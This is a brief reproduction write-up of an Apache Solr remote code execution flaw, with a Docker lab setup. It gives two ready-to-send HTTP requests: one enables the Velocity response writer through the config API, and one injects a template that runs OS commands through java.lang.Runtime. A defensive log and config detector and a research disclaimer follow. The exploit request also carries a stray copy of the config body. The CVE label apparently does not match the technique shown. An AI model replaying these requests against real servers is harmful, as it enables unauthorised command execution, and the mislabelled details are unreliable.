Affected versions
Apache Solr < 8.2.0
Steps
docker pull scxiaotan2/apache-solr:cve-2019-0193 # pull the image
docker run -it scxiaotan2/apache-solr:cve-2019-0193 /bin/bash # start a shell in the container
./start.sh # start the service from the root directory
netstat -tlnp # port 8983 is now listening
Prerequisite:
The attacker must know the name of a Core in the Solr service to carry out the attack.
PoC
POST /solr/core1/config HTTP/1.1
Host: 172.17.0.2:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.2/solr
Connection: close
Content-Length: 222

{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
Exploit:
POST /solr/core1/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 172.17.0.2:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.2/solr
Connection: close
Content-Length: 222

{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
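A defender-side check for the two steps above (the config-API write that enables VelocityResponseWriter with a resource loader, and the select request that passes an inline template). This is an added example, not code from the original post or from Solr; it assumes the config JSON layout of Solr's /solr/<core>/config response and an access-log line format of "METHOD target status", and all sample input below is constructed.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Constructed sample of the JSON a core returns from /solr/<core>/config after
# the PoC has been applied (assumption: writers keyed by name under "queryResponseWriter").
SAMPLE_CONFIG = json.dumps({
    "config": {
        "queryResponseWriter": {
            "velocity": {
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true",
            },
        }
    }
})

def velocity_loader_risks(config_json):
    """Names of writers using VelocityResponseWriter with a resource loader enabled."""
    writers = json.loads(config_json).get("config", {}).get("queryResponseWriter", {})
    risky = []
    for name, w in writers.items():
        if not str(w.get("class", "")).endswith("VelocityResponseWriter"):
            continue
        loaders = ("params.resource.loader.enabled", "solr.resource.loader.enabled")
        if any(str(w.get(k, "false")).lower() == "true" for k in loaders):
            risky.append(name)
    return risky

# Constructed access-log style lines: method, request target, status.
SAMPLE_LOG = """\
POST /solr/core1/config 200
GET /solr/core1/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=1) 200
GET /solr/core1/select?q=*:*&wt=json 200
"""

def suspicious_requests(log_text):
    """Flag config-API writes and velocity-writer requests carrying v.template* parameters."""
    hits = []
    for line in log_text.splitlines():
        method, target, _status = line.split(" ", 2)
        url = urlsplit(target)
        qs = parse_qs(url.query)
        if method == "POST" and url.path.endswith("/config"):
            hits.append(("config-write", url.path))
        elif qs.get("wt") == ["velocity"] and any(k.startswith("v.template") for k in qs):
            hits.append(("velocity-template", url.path))
    return hits
```

A config-write hit followed by a velocity-template hit against the same core is the sequence to alert on; on a patched or hardened instance the first check should return an empty list.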
Disclaimer:
The PoC and exploit mentioned in this article are for research and learning purposes only; please comply with the Cybersecurity Law and other relevant laws and regulations.
References
https://github.com/scxiaotan1/Docker/tree/master/CVE-2019-0193
https://github.com/1135/solr_exploit